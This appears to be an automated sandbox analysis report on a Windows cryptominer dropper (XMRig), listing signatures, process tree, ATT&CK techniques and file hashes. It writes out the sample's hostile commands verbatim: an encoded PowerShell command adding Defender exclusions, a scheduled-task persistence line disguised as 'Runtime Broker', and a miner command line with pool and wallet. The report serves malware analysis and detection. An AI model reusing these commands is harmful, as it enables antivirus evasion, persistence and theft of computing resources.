Analysis

  • max time kernel
    73s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 05:20

General

  • Target

    a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6.exe

  • Size

    4.8MB

  • MD5

    b4aa27a1339c69d99121a4fe4fac94f7

  • SHA1

    72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

  • SHA256

    a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

  • SHA512

    3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX or a modified UPX (open-source packer).

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6.exe
    "C:\Users\Admin\AppData\Local\Temp\a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
    • C:\Windows\system32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
      2⤵
      • Creates scheduled task(s)
      PID:4724
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4336
  • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
    "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
    1⤵
    • Executes dropped EXE
    PID:3976
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
      2⤵
      PID:1224
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "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"
        3⤵
        PID:1960
  • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
    "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
    1⤵
    PID:1764
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "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"
      2⤵
      PID:1848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "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"
        3⤵
        PID:4116

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Execution
    Scheduled Task (1) T1053
  • Persistence
    Scheduled Task (1) T1053
  • Privilege Escalation
    Scheduled Task (1) T1053
  • Discovery
    Query Registry (1) T1012
    System Information Discovery (2) T1082
  • Command and Control
    Web Service (1) T1102

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    e243a38635ff9a06c87c2a61a2200656

    SHA1

    ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

    SHA256

    af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

    SHA512

    4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    771f6359fc8b2d2046610c3330174bc4

    SHA1

    215f804044a3be8bde587a8e6d4eb359a540ed1d

    SHA256

    7c33d8031b1f1d48d6e44e757a7cfdd5ae27eab15154b800bb9f0a61bae005d9

    SHA512

    0f197014b0f1b286f310b7145ae7650e06cd0a53c1c73b6a5b22f9552a5f71a39fb7e9e435ba18cd84aeda6c01b7bb8e0ddc22b52b08d554d1756189d1a3409d

  • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
    Filesize

    4.8MB

    MD5

    b4aa27a1339c69d99121a4fe4fac94f7

    SHA1

    72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

    SHA256

    a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

    SHA512

    3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

  • memory/1224-145-0x0000000000000000-mapping.dmp
  • memory/1848-152-0x0000000000000000-mapping.dmp
  • memory/1960-146-0x0000000000000000-mapping.dmp
  • memory/1960-148-0x00007FFCB0340000-0x00007FFCB0E01000-memory.dmp
    Filesize

    10.8MB

  • memory/2572-133-0x00007FFCB0BC0000-0x00007FFCB1681000-memory.dmp
    Filesize

    10.8MB

  • memory/2572-132-0x0000021C54510000-0x0000021C54532000-memory.dmp
    Filesize

    136KB

  • memory/2572-131-0x0000000000000000-mapping.dmp
  • memory/2892-130-0x0000000000000000-mapping.dmp
  • memory/4116-153-0x0000000000000000-mapping.dmp
  • memory/4116-155-0x00007FFCB0340000-0x00007FFCB0E01000-memory.dmp
    Filesize

    10.8MB

  • memory/4336-136-0x00007FF6185748A0-mapping.dmp
  • memory/4336-142-0x00000000013F0000-0x0000000001430000-memory.dmp
    Filesize

    256KB

  • memory/4336-141-0x0000000000DD0000-0x0000000000DF0000-memory.dmp
    Filesize

    128KB

  • memory/4336-140-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
    Filesize

    7.9MB

  • memory/4336-139-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
    Filesize

    7.9MB

  • memory/4336-151-0x00000000012E0000-0x0000000001300000-memory.dmp
    Filesize

    128KB

  • memory/4336-138-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
    Filesize

    7.9MB

  • memory/4336-137-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
    Filesize

    7.9MB

  • memory/4336-135-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
    Filesize

    7.9MB

  • memory/4724-134-0x0000000000000000-mapping.dmp